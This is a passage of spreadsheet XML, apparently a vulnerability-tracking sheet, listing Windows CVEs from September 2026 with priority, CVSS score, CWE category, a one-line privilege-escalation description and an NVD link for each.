      <c r="P559" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q559" s="5" t="inlineStr"/>
      <c r="R559" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S559" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows MIDI Service Module allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69720</t>
        </is>
      </c>
    </row>
    <row r="560">
      <c r="A560" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B560" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69725</t>
        </is>
      </c>
      <c r="D560" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E560" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F560" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G560" s="5" t="inlineStr"/>
      <c r="H560" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I560" s="5" t="inlineStr"/>
      <c r="J560" s="5" t="inlineStr"/>
      <c r="K560" s="5" t="inlineStr"/>
      <c r="L560" s="5" t="inlineStr"/>
      <c r="M560" s="5" t="inlineStr"/>
      <c r="N560" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O560" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P560" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q560" s="5" t="inlineStr"/>
      <c r="R560" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S560" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69725</t>
        </is>
      </c>
    </row>
    <row r="561">
      <c r="A561" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B561" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69731</t>
        </is>
      </c>
      <c r="D561" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E561" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F561" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G561" s="5" t="inlineStr"/>
      <c r="H561" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I561" s="5" t="inlineStr"/>
      <c r="J561" s="5" t="inlineStr"/>
      <c r="K561" s="5" t="inlineStr"/>
      <c r="L561" s="5" t="inlineStr"/>
      <c r="M561" s="5" t="inlineStr"/>
      <c r="N561" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O561" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P561" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q561" s="5" t="inlineStr"/>
      <c r="R561" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S561" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in HID class driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69731</t>
        </is>
      </c>
    </row>
    <row r="562">
      <c r="A562" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B562" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69738</t>
        </is>
      </c>
      <c r="D562" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E562" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F562" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G562" s="5" t="inlineStr"/>
      <c r="H562" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I562" s="5" t="inlineStr"/>
      <c r="J562" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K56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62" s="5" t="inlineStr"/>
      <c r="M562" s="5" t="inlineStr"/>
      <c r="N562" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O562" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P562" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q562" s="5" t="inlineStr"/>
      <c r="R562" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S562" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69738</t>
        </is>
      </c>
    </row>
    <row r="563">
      <c r="A563" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B563" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69758</t>
        </is>
      </c>
      <c r="D563" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E563" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F563" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G563" s="5" t="inlineStr"/>
      <c r="H563" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I563" s="5" t="inlineStr"/>
      <c r="J563" s="5" t="inlineStr"/>
      <c r="K563" s="5" t="inlineStr"/>
      <c r="L563" s="5" t="inlineStr"/>
      <c r="M563" s="5" t="inlineStr"/>
      <c r="N563" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O563" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P563" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q563" s="5" t="inlineStr"/>
      <c r="R563" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S563" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69758</t>
        </is>
      </c>
    </row>
    <row r="564">
      <c r="A564" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B564" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69785</t>
        </is>
      </c>
      <c r="D564" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E564" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F564" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G564" s="5" t="inlineStr"/>
      <c r="H564" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I564" s="5" t="inlineStr"/>
      <c r="J564" s="5" t="inlineStr"/>
      <c r="K564" s="5" t="inlineStr"/>
      <c r="L564" s="5" t="inlineStr"/>
      <c r="M564" s="5" t="inlineStr"/>
      <c r="N564" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O564" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P564" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q564" s="5" t="inlineStr"/>
      <c r="R564" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="S564" s="5" t="inlineStr">
        <is>
          <t>Untrusted search path in Windows Smart Card allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69785</t>
        </is>
      </c>
    </row>
    <row r="565">
      <c r="A565" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B565" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69787</t>
        </is>
      </c>
      <c r="D565" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E565" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F565" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G565" s="5" t="inlineStr"/>
      <c r="H565" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I565" s="5" t="inlineStr"/>
      <c r="J565" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K56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65" s="5" t="inlineStr"/>
      <c r="M565" s="5" t="inlineStr"/>
      <c r="N565" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O565" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P565" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q565" s="5" t="inlineStr"/>
      <c r="R565" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S565" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69787</t>
        </is>
      </c>
    </row>
    <row r="566">
      <c r="A566" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B566" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69790</t>
        </is>
      </c>
      <c r="D566" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E566" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F566" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G566" s="5" t="inlineStr"/>
      <c r="H566" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I566" s="5" t="inlineStr"/>
      <c r="J566" s="5" t="inlineStr"/>
      <c r="K566" s="5" t="inlineStr"/>
      <c r="L566" s="5" t="inlineStr"/>
      <c r="M566" s="5" t="inlineStr"/>
      <c r="N566" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O566" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P566" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q566" s="5" t="inlineStr"/>
      <c r="R566" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S566" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69790</t>
        </is>
      </c>
    </row>
    <row r="567">
      <c r="A567" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B567" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69799</t>
        </is>
      </c>
      <c r="D567" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E567" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F567" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G567" s="5" t="inlineStr"/>
      <c r="H567" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I567" s="5" t="inlineStr"/>
      <c r="J567" s="5" t="inlineStr"/>
      <c r="K567" s="5" t="inlineStr"/>
      <c r="L567" s="5" t="inlineStr"/>
      <c r="M567" s="5" t="inlineStr"/>
      <c r="N567" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O567" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P567" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q567" s="5" t="inlineStr"/>
      <c r="R567" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="S567" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69799</t>
        </is>
      </c>
    </row>
    <row r="568">
      <c r="A568" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B568" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69801</t>
        </is>
      </c>
      <c r="D568" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E568" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F568" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G568" s="5" t="inlineStr"/>
      <c r="H568" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I568" s="5" t="inlineStr"/>
      <c r="J568" s="5" t="inlineStr"/>
      <c r="K568" s="5" t="inlineStr"/>
      <c r="L568" s="5" t="inlineStr"/>
      <c r="M568" s="5" t="inlineStr"/>
      <c r="N568" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O568" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P568" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q568" s="5" t="inlineStr"/>
      <c r="R568" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S568" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69801</t>
        </is>
      </c>
    </row>
    <row r="569">
      <c r="A569" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B569" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69821</t>
        </is>
      </c>
      <c r="D569" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E569" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F569" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G569" s="5" t="inlineStr"/>
      <c r="H569" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I569" s="5" t="inlineStr"/>
      <c r="J569" s="5" t="inlineStr"/>
      <c r="K569" s="5" t="inlineStr"/>
      <c r="L569" s="5" t="inlineStr"/>
      <c r="M569" s="5" t="inlineStr"/>
      <c r="N569" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O569" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P569" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q569" s="5" t="inlineStr"/>
      <c r="R569" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="S569" s="5" t="inlineStr">
        <is>
          <t>Improper encoding or escaping of output in Active Directory Certificate Services (AD CS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69821</t>
        </is>
      </c>
    </row>
    <row r="570">
      <c r="A570" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B570" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69822</t>
        </is>
      </c>
      <c r="D570" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E570" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F570" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G570" s="5" t="inlineStr"/>
      <c r="H570" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I570" s="5" t="inlineStr"/>
      <c r="J570" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K57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570" s="5" t="inlineStr"/>
      <c r="M570" s="5" t="inlineStr"/>
      <c r="N570" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O570" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P570" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q570" s="5" t="inlineStr"/>
      <c r="R570" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="S570" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69822</t>
        </is>
      </c>
    </row>
    <row r="571">
      <c r="A571" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B571" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C571" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69841</t>
        </is>
      </c>
      <c r="D571" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E571" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F571" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G571" s="5" t="inlineStr"/>
      <c r="H571" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I571" s="5" t="inlineStr"/>
      <c r="J571" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K57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71" s="5" t="inlineStr"/>
      <c r="M571" s="5" t="inlineStr"/>
      <c r="N571" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O571" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P571" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q571" s="5" t="inlineStr"/>
      <c r="R571" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S571" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69841</t>
        </is>
      </c>
    </row>
    <row r="572">
      <c r="A572" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B572" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C572" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69844</t>
        </is>
      </c>
      <c r="D572" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E572" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F572" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G572" s="5" t="inlineStr"/>
      <c r="H572" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I572" s="5" t="inlineStr"/>
      <c r="J572" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K57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72" s="5" t="inlineStr"/>
      <c r="M572" s="5" t="inlineStr"/>
      <c r="N572" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O572" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P572" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q572" s="5" t="inlineStr"/>
      <c r="R572" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S572" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69844</t>
        </is>
      </c>
    </row>
    <row r="573">
      <c r="A573" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B573" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C573" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69864</t>
        </is>
      </c>
      <c r="D573" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E573" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F573" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G573" s="5" t="inlineStr"/>
      <c r="H573" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I573" s="5" t="inlineStr"/>
      <c r="J573" s="5" t="inlineStr"/>
      <c r="K573" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="L573" s="5" t="inlineStr"/>
      <c r="M573" s="5" t="inlineStr"/>
      <c r="N573" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O573" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P573" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q573" s="5" t="inlineStr"/>
      <c r="R573" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S573" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69864</t>
        </is>
      </c>
    </row>
    <row r="574">
      <c r="A574" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B574" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C574" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69900</t>
        </is>
      </c>
      <c r="D574" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E574" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F574" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G574" s="5" t="inlineStr"/>
      <c r="H574" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I574" s="5" t="inlineStr"/>
      <c r="J574" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K574" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L574" s="5" t="inlineStr"/>
      <c r="M574" s="5" t="inlineStr"/>
      <c r="N574" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O574" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P574" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q574" s="5" t="inlineStr"/>
      <c r="R574" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S574" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69900</t>
        </is>
      </c>
    </row>
    <row r="575">
      <c r="A575" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B575" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C575" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69907</t>
        </is>
      </c>
      <c r="D575" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E575" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F575" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G575" s="5" t="inlineStr"/>
      <c r="H575" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I575" s="5" t="inlineStr"/>
      <c r="J575" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K57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75" s="5" t="inlineStr"/>
      <c r="M575" s="5" t="inlineStr"/>
      <c r="N575" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O575" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P575" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q575" s="5" t="inlineStr"/>
      <c r="R575" s="5" t="inlineStr">
        <is>
          <t>CWE-280</t>
        </is>
      </c>
      <c r="S575" s="5" t="inlineStr">
        <is>
          <t>Improper handling of insufficient permissions or privileges in Windows Enterprise App Management allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69907</t>
        </is>
      </c>
    </row>
    <row r="576">
      <c r="A576" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B576" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C576" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69921</t>
        </is>
      </c>
      <c r="D576" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E576" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F576" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G576" s="5" t="inlineStr"/>
      <c r="H576" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I576" s="5" t="inlineStr"/>
      <c r="J576" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K576" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L576" s="5" t="inlineStr"/>
      <c r="M576" s="5" t="inlineStr"/>
      <c r="N576" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O576" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P576" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q576" s="5" t="inlineStr"/>
      <c r="R576" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S576" s="5" t="inlineStr">
        <is>
